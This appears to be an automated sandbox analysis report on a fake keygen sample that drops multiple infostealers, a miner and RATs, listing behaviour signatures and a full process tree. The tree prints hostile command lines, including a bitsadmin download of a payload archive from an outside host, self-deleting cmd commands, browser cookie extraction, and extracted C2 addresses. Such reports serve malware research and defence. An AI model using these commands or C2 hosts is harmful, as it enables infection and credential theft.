Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    338s
  • max time network
    1791s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    28-04-2021 04:33

General

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Extracted

Family

redline

Botnet

EUU

C2

download3.info:80

Signatures

  • BlackNET

    BlackNET is an open source remote access tool written in VB.NET.

  • Detected facebook phishing page
  • ElysiumStealer

    ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.

  • Fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 42 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 12 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 9 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
  • Suspicious use of SetThreadContext 13 IoCs
  • autoit_exe 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 13 IoCs
  • NTFS ADS 2 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
    • Modifies registry class
    PID:2936
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2696
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2688
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2532
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
      1⤵
        PID:2484
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
        1⤵
          PID:1884
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s SENS
          1⤵
            PID:1468
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
            1⤵
              PID:1392
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Themes
              1⤵
                PID:1224
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                1⤵
                  PID:1104
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                  1⤵
                  • Drops file in System32 directory
                  PID:1028
                  • C:\Users\Admin\AppData\Roaming\cgcvcit
                    C:\Users\Admin\AppData\Roaming\cgcvcit
                    2⤵
                      PID:4684
                    • C:\Users\Admin\AppData\Roaming\idcvcit
                      C:\Users\Admin\AppData\Roaming\idcvcit
                      2⤵
                        PID:6124
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                      1⤵
                        PID:60
                      • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
                        "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
                        1⤵
                        • Checks computer location settings
                        • Suspicious use of WriteProcessMemory
                        PID:784
                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                          2⤵
                          • Executes dropped EXE
                          • Drops file in Program Files directory
                          • Suspicious use of SetWindowsHookEx
                          • Suspicious use of WriteProcessMemory
                          PID:200
                          • C:\Windows\SysWOW64\rundll32.exe
                            "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                            3⤵
                            • Loads dropped DLL
                            • Modifies registry class
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:3108
                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1200
                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:2132
                          • C:\Users\Admin\AppData\Local\Temp\is-1SIK0.tmp\Install.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-1SIK0.tmp\Install.tmp" /SL5="$40138,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of WriteProcessMemory
                            PID:1184
                            • C:\Users\Admin\AppData\Local\Temp\is-OQVHQ.tmp\Ultra.exe
                              "C:\Users\Admin\AppData\Local\Temp\is-OQVHQ.tmp\Ultra.exe" /S /UID=burnerch1
                              4⤵
                              • Drops file in Drivers directory
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:3796
                              • C:\Program Files\Microsoft Office 15\TGIIMTYDIE\ultramediaburner.exe
                                "C:\Program Files\Microsoft Office 15\TGIIMTYDIE\ultramediaburner.exe" /VERYSILENT
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:1600
                                • C:\Users\Admin\AppData\Local\Temp\is-GG0PD.tmp\ultramediaburner.tmp
                                  "C:\Users\Admin\AppData\Local\Temp\is-GG0PD.tmp\ultramediaburner.tmp" /SL5="$A0068,281924,62464,C:\Program Files\Microsoft Office 15\TGIIMTYDIE\ultramediaburner.exe" /VERYSILENT
                                  6⤵
                                  • Executes dropped EXE
                                  • Drops file in Program Files directory
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of WriteProcessMemory
                                  PID:3712
                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                    "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                    7⤵
                                    • Executes dropped EXE
                                    PID:4176
                              • C:\Users\Admin\AppData\Local\Temp\4e-018c6-c16-d9d8a-f9801e42bfc0b\Vaesovaesapi.exe
                                "C:\Users\Admin\AppData\Local\Temp\4e-018c6-c16-d9d8a-f9801e42bfc0b\Vaesovaesapi.exe"
                                5⤵
                                • Executes dropped EXE
                                • Checks computer location settings
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4108
                              • C:\Users\Admin\AppData\Local\Temp\2c-83f10-18f-77784-37b898d61dac1\Heveqyqoshi.exe
                                "C:\Users\Admin\AppData\Local\Temp\2c-83f10-18f-77784-37b898d61dac1\Heveqyqoshi.exe"
                                5⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:4164
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gzdfamsm.rnj\skipper.exe /s & exit
                                  6⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:5052
                                  • C:\Users\Admin\AppData\Local\Temp\gzdfamsm.rnj\skipper.exe
                                    C:\Users\Admin\AppData\Local\Temp\gzdfamsm.rnj\skipper.exe /s
                                    7⤵
                                    • Executes dropped EXE
                                    • Suspicious use of WriteProcessMemory
                                    PID:4160
                                    • C:\Users\Admin\AppData\Local\Temp\1623988909.exe
                                      C:\Users\Admin\AppData\Local\Temp\1623988909.exe
                                      8⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      PID:1204
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                        9⤵
                                          PID:1356
                                      • C:\Users\Admin\AppData\Local\Temp\1245272851.exe
                                        C:\Users\Admin\AppData\Local\Temp\1245272851.exe
                                        8⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:5824
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                          9⤵
                                            PID:5776
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\gzdfamsm.rnj\skipper.exe & exit
                                          8⤵
                                            PID:5676
                                            • C:\Windows\SysWOW64\PING.EXE
                                              ping 0
                                              9⤵
                                              • Runs ping.exe
                                              PID:5564
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qdzchef4.bdj\001.exe & exit
                                        6⤵
                                          PID:872
                                          • C:\Users\Admin\AppData\Local\Temp\qdzchef4.bdj\001.exe
                                            C:\Users\Admin\AppData\Local\Temp\qdzchef4.bdj\001.exe
                                            7⤵
                                              PID:5008
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jxn32bw0.3k5\gpooe.exe & exit
                                            6⤵
                                              PID:6104
                                              • C:\Users\Admin\AppData\Local\Temp\jxn32bw0.3k5\gpooe.exe
                                                C:\Users\Admin\AppData\Local\Temp\jxn32bw0.3k5\gpooe.exe
                                                7⤵
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                PID:5224
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  8⤵
                                                  • Executes dropped EXE
                                                  PID:5504
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  8⤵
                                                  • Executes dropped EXE
                                                  PID:4224
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  8⤵
                                                    PID:1988
                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    8⤵
                                                      PID:4200
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m0whbqi0.yvt\google-game.exe & exit
                                                  6⤵
                                                    PID:5528
                                                    • C:\Users\Admin\AppData\Local\Temp\m0whbqi0.yvt\google-game.exe
                                                      C:\Users\Admin\AppData\Local\Temp\m0whbqi0.yvt\google-game.exe
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Drops file in Program Files directory
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:5732
                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                        8⤵
                                                          PID:5692
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r0hcrfww.awh\HookSetp.exe /silent & exit
                                                      6⤵
                                                        PID:432
                                                        • C:\Users\Admin\AppData\Local\Temp\r0hcrfww.awh\HookSetp.exe
                                                          C:\Users\Admin\AppData\Local\Temp\r0hcrfww.awh\HookSetp.exe /silent
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:6040
                                                          • C:\Users\Admin\AppData\Roaming\4085882.exe
                                                            "C:\Users\Admin\AppData\Roaming\4085882.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:5268
                                                          • C:\Users\Admin\AppData\Roaming\3877687.exe
                                                            "C:\Users\Admin\AppData\Roaming\3877687.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            • Adds Run key to start application
                                                            PID:5792
                                                            • C:\ProgramData\Windows Host\Windows Host.exe
                                                              "C:\ProgramData\Windows Host\Windows Host.exe"
                                                              9⤵
                                                              • Executes dropped EXE
                                                              PID:5576
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gdil4xau.z0h\askinstall39.exe & exit
                                                        6⤵
                                                          PID:5900
                                                          • C:\Users\Admin\AppData\Local\Temp\gdil4xau.z0h\askinstall39.exe
                                                            C:\Users\Admin\AppData\Local\Temp\gdil4xau.z0h\askinstall39.exe
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:5148
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd.exe /c taskkill /f /im chrome.exe
                                                              8⤵
                                                                PID:5572
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /f /im chrome.exe
                                                                  9⤵
                                                                  • Kills process with taskkill
                                                                  PID:5816
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lj0gilyg.eke\y1.exe & exit
                                                            6⤵
                                                              PID:5024
                                                              • C:\Users\Admin\AppData\Local\Temp\lj0gilyg.eke\y1.exe
                                                                C:\Users\Admin\AppData\Local\Temp\lj0gilyg.eke\y1.exe
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                PID:3872
                                                                • C:\Users\Admin\AppData\Local\Temp\k8DKWTSg4Q.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\k8DKWTSg4Q.exe"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  • Modifies system certificate store
                                                                  PID:5272
                                                                  • C:\Users\Admin\AppData\Roaming\1619592009972.exe
                                                                    "C:\Users\Admin\AppData\Roaming\1619592009972.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619592009972.txt"
                                                                    9⤵
                                                                      PID:3568
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\k8DKWTSg4Q.exe"
                                                                      9⤵
                                                                        PID:1016
                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                          ping 127.0.0.1 -n 3
                                                                          10⤵
                                                                          • Runs ping.exe
                                                                          PID:5092
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\lj0gilyg.eke\y1.exe"
                                                                      8⤵
                                                                        PID:3988
                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                          timeout /T 10 /NOBREAK
                                                                          9⤵
                                                                          • Delays execution with timeout.exe
                                                                          PID:320
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fvytclfg.y20\requête.exe & exit
                                                                    6⤵
                                                                      PID:5828
                                                                      • C:\Users\Admin\AppData\Local\Temp\fvytclfg.y20\requête.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\fvytclfg.y20\requête.exe
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        PID:3188
                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
                                                                          8⤵
                                                                            PID:2788
                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                                              parse.exe -f json -b firefox
                                                                              9⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              PID:4100
                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                                              parse.exe -f json -b edge
                                                                              9⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              PID:4532
                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                                              parse.exe -f json -b chrome
                                                                              9⤵
                                                                                PID:5912
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4dbvkph4.lrp\SunLabsPlayer.exe /S & exit
                                                                          6⤵
                                                                            PID:3436
                                                                            • C:\Users\Admin\AppData\Local\Temp\4dbvkph4.lrp\SunLabsPlayer.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\4dbvkph4.lrp\SunLabsPlayer.exe /S
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Drops file in Program Files directory
                                                                              PID:5852
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFC16.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:928
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFC16.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:3576
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFC16.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:5204
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFC16.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                        PID:5440
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFC16.tmp\tempfile.ps1"
                                                                                        8⤵
                                                                                          PID:2788
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFC16.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                            PID:5284
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFC16.tmp\tempfile.ps1"
                                                                                            8⤵
                                                                                            • Checks for any installed AV software in registry
                                                                                            PID:1772
                                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                            "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                            8⤵
                                                                                            • Download via BitsAdmin
                                                                                            PID:4928
                                                                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pLZQiSM75KRmgEsZ -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                            8⤵
                                                                                              PID:5540
                                                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -plIt7BMSl5CGLPUK -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                              8⤵
                                                                                                PID:156
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFC16.tmp\tempfile.ps1"
                                                                                                8⤵
                                                                                                  PID:928
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFC16.tmp\tempfile.ps1"
                                                                                                  8⤵
                                                                                                    PID:5584
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFC16.tmp\tempfile.ps1"
                                                                                                    8⤵
                                                                                                      PID:5088
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFC16.tmp\tempfile.ps1"
                                                                                                      8⤵
                                                                                                        PID:5632
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFC16.tmp\tempfile.ps1"
                                                                                                        8⤵
                                                                                                          PID:4588
                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HjhHaWQ\HjhHaWQ.dll" HjhHaWQ
                                                                                                          8⤵
                                                                                                            PID:3584
                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HjhHaWQ\HjhHaWQ.dll" HjhHaWQ
                                                                                                              9⤵
                                                                                                                PID:5644
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFC16.tmp\tempfile.ps1"
                                                                                                              8⤵
                                                                                                                PID:1292
                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  9⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:5032
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFC16.tmp\tempfile.ps1"
                                                                                                                8⤵
                                                                                                                  PID:4692
                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFC16.tmp\tempfile.ps1"
                                                                                                                  8⤵
                                                                                                                    PID:2368
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      9⤵
                                                                                                                        PID:5092
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFC16.tmp\tempfile.ps1"
                                                                                                                      8⤵
                                                                                                                        PID:4036
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscFC16.tmp\tempfile.ps1"
                                                                                                                        8⤵
                                                                                                                          PID:632
                                                                                                                        • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                          "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                          8⤵
                                                                                                                            PID:2664
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\chw4njuu.qaf\005.exe & exit
                                                                                                                        6⤵
                                                                                                                          PID:5100
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\chw4njuu.qaf\005.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\chw4njuu.qaf\005.exe
                                                                                                                            7⤵
                                                                                                                              PID:5032
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\omautiv2.w4q\GcleanerWW.exe /mixone & exit
                                                                                                                            6⤵
                                                                                                                            • Loads dropped DLL
                                                                                                                            PID:5692
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\31dwcivj.s4q\toolspab1.exe & exit
                                                                                                                            6⤵
                                                                                                                              PID:4880
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\31dwcivj.s4q\toolspab1.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\31dwcivj.s4q\toolspab1.exe
                                                                                                                                7⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                PID:3928
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\31dwcivj.s4q\toolspab1.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\31dwcivj.s4q\toolspab1.exe
                                                                                                                                  8⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                  PID:4400
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zmi3bcdx.akd\c7ae36fa.exe & exit
                                                                                                                              6⤵
                                                                                                                                PID:4960
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\zmi3bcdx.akd\c7ae36fa.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\zmi3bcdx.akd\c7ae36fa.exe
                                                                                                                                  7⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                  PID:5908
